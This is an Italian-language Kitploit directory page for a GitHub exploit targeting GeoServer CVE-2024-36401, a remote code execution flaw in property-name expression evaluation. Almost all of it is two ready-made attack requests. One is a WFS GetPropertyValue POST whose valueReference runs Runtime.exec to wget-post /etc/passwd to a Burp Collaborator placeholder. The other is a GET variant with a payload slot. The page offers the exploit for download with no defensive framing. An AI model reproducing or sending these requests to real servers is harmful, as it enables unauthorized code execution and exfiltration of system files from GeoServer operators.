Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GeoServer-CVE-2024-36401 — GeoServer CVE-2024-36401: Vulnerabilità di Esecuzione di Codice Remoto (RCE) nella Valutazione delle Espressioni dei Nomi delle Proprietà | Kitploit
Strumenti/GitHubGitHub/punitdarji/geoserver-cve-2024-36401
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubpunitdarji/geoserver-cve-2024-36401

GeoServer-CVE-2024-36401

GeoServer CVE-2024-36401: Vulnerabilità di Esecuzione di Codice Remoto (RCE) nella Valutazione delle Espressioni dei Nomi delle Proprietà

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

GeoServer-CVE-2024-36401

GeoServer CVE-2024-36401: Vulnerabilità di esecuzione di codice remoto (RCE) nella valutazione delle espressioni dei nomi delle proprietà

GetPropertyValue

root@kitploit:~
POST /geoserver/wfs HTTP/1.1
Host: PunitDarji
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 2

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"wget --post-file=/etc/passwd <BURP COLLOBRATOR>")'>
  <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>
root@kitploit:~
GET /geoserver/wfs?request=GetPropertyValue&service=wfs&typeNames=topp:states&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%22<PAYLOAD>%22%29&version=2.0.0
Scarica lo strumento